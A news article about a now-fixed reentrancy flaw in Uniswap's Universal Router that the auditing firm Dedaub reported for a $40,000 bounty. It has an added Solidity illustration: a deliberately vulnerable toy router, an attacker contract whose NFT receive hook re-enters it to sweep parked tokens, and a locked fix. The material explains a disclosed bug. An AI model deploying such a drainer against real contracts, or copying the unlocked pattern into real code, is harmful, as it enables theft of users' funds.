DeFi auditor nets $40,000 for identifying Uniswap vulnerability

Published at: Jan. 4, 2023

Uniswap’s recently launched bug bounty program has led to the discovery of a now-fixed vulnerability in the protocol’s Universal Router smart contract.

The automated market maker released two new smart contracts to its platform in November 2022. Permit2 allows token approvals to be shared and managed across different applications, while Universal Router unifies ERC-20 and nonfungible token (NFT) swapping in a single swap router.

Uniswap also advertised a lucrative bug bounty program towards the end of 2022 to surface potential vulnerabilities in these smart contracts, as it looked to assure the safety and correct operation of its protocol.

Smart contract security and auditing firm Dedaub announced that it had received a bug bounty after flagging a vulnerability in the Universal Router smart contract that would have allowed an attacker to re-enter the router and drain user funds mid-transaction.

The Dedaub team has disclosed a Critical vulnerability to the Uniswap team! Funds are safe - Uniswap addressed the issue and redeployed the Universal Router smart contracts on all its chains. The vulnerability allows re-entrancy to drain the user's funds, mid-tx. pic.twitter.com/wFSFsohPvy

— Dedaub (@dedaub) January 2, 2023

According to Dedaub’s breakdown, the Universal Router allows users to perform diverse actions including swapping multiple tokens and NFTs in one transaction.

The router embeds a small command language covering a wide variety of token actions, including transfers to third-party recipients. Correctly implemented, each transfer goes only to the specified recipient, with the specified parameters.


However, Dedaub found that third-party code could be invoked during such a transfer (a recipient contract's code runs when an NFT is transferred to it), and that this code could re-enter the Universal Router and claim any tokens the contract was temporarily holding at that point in the transaction.

Dedaub then suggested a straightforward remedy: add a reentrancy lock around the new router's core execution function, so that no callback can re-enter it while a batch of commands is still in progress. Uniswap awarded the auditing firm a total of $40,000 for flagging the vulnerability. The amount included a 33% bonus for reporting the issue during Uniswap’s bonus period in November 2022.
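As an added illustration (not code from the article, from Uniswap or from Dedaub), the Solidity below models the bug class described above: a hypothetical batch router whose NFT-forwarding command hands control to the recipient, a malicious recipient whose ERC-721 receive hook re-enters the router to sweep ERC-20 tokens the outer batch had parked there, and a hardened variant with the reentrancy lock the report recommended. The contract names, the two-command toy instruction set and the command byte values are assumptions made for this example; the real Universal Router's ABI and internals are not reproduced.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Hypothetical illustration of the bug class described in the article.
// The interfaces below are minimal and are assumptions, not the Universal Router's real ABI.
interface IERC20 {
    function balanceOf(address account) external view returns (uint256);
    function transfer(address to, uint256 amount) external returns (bool);
}

interface IERC721 {
    // Calls onERC721Received on `to` when `to` is a contract: that callback is the
    // point where untrusted third-party code runs in the middle of the router's batch.
    function safeTransferFrom(address from, address to, uint256 tokenId) external;
}

/// Shared command dispatcher for a toy batch router (hypothetical, not Uniswap's code).
/// Commands are single bytes; each has an ABI-encoded input blob.
abstract contract RouterBase {
    uint8 internal constant SWEEP_ERC20 = 0x01;       // send the router's whole balance of a token
    uint8 internal constant SAFE_TRANSFER_NFT = 0x02; // forward an NFT the router holds

    function execute(bytes calldata commands, bytes[] calldata inputs) external virtual;

    function _run(bytes calldata commands, bytes[] calldata inputs) internal {
        require(commands.length == inputs.length, "length mismatch");
        for (uint256 i = 0; i < commands.length; i++) {
            _dispatch(uint8(commands[i]), inputs[i]);
        }
    }

    function _dispatch(uint8 command, bytes calldata input) internal {
        if (command == SWEEP_ERC20) {
            (address token, address recipient) = abi.decode(input, (address, address));
            uint256 balance = IERC20(token).balanceOf(address(this));
            if (balance > 0) require(IERC20(token).transfer(recipient, balance), "transfer failed");
        } else if (command == SAFE_TRANSFER_NFT) {
            (address nft, address recipient, uint256 id) =
                abi.decode(input, (address, address, uint256));
            // External call into `recipient`'s code if it is a contract.
            IERC721(nft).safeTransferFrom(address(this), recipient, id);
        } else {
            revert("unknown command");
        }
    }
}

/// Vulnerable: nothing stops execute() from being entered again from inside a command.
/// A batch like [SAFE_TRANSFER_NFT to attacker, SWEEP_ERC20 to user] parks the user's
/// ERC-20 output in the router while the NFT hook runs; the hook can sweep it first.
contract VulnerableRouter is RouterBase {
    function execute(bytes calldata commands, bytes[] calldata inputs) external override {
        _run(commands, inputs);
    }
}

/// Hardened: a reentrancy lock around the whole batch, the remedy the article describes.
/// A nested execute() from a callback now reverts, which unwinds the entire outer batch.
contract LockedRouter is RouterBase {
    uint256 private _status = 1; // 1 = unlocked, 2 = executing

    modifier nonReentrant() {
        require(_status == 1, "reentrant call");
        _status = 2;
        _;
        _status = 1;
    }

    function execute(bytes calldata commands, bytes[] calldata inputs) external override nonReentrant {
        _run(commands, inputs);
    }
}

/// Attacker-controlled NFT recipient. When the router forwards an NFT to it, the
/// ERC-721 receive hook re-enters the router and sweeps whatever ERC-20 is parked there.
contract MaliciousRecipient {
    address private immutable router;
    address private immutable token;

    constructor(address router_, address token_) {
        router = router_;
        token = token_;
    }

    function onERC721Received(address, address, uint256, bytes calldata) external returns (bytes4) {
        bytes memory commands = abi.encodePacked(uint8(0x01)); // SWEEP_ERC20
        bytes[] memory inputs = new bytes[](1);
        inputs[0] = abi.encode(token, address(this)); // pay the router's balance to us
        RouterBase(router).execute(commands, inputs);   // reentrant call
        return this.onERC721Received.selector;
    }
}
```

Against VulnerableRouter, a batch whose first command forwards an NFT to MaliciousRecipient and whose second command sweeps an ERC-20 to the user loses the ERC-20: the hook runs between the two commands and sweeps it while it still sits in the router. Against LockedRouter the nested execute() hits "reentrant call", the revert bubbles up through safeTransferFrom, and the entire outer transaction reverts, so the user keeps their funds. For brevity the example uses the direct form in which the user names the attacker's contract as the NFT recipient; the article notes Uniswap treated that case as user error and rated the vector low-likelihood because the realistic triggers were more complex, but the lock closes all of them in the same way.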

Uniswap classified the issue as medium severity: high impact, but low likelihood. According to Dedaub, the simplest trigger, a user directly sending NFTs to an untrusted recipient, was considered user error.

The scenarios that remained valid reentrancy vectors were more complex and less likely to occur, which is why Uniswap deemed the vector to have a low likelihood.

Bug bounties have become commonplace in the cryptocurrency and blockchain space as platforms and companies look to ensure the security of their software, systems and infrastructure. 

Cryptocurrency exchange Coinbase recently clarified the terms of its bug bounty, while blockchain security firm Immunefi has facilitated over $65 million worth of bug bounties between ethical hackers and Web3 firms in 2022.
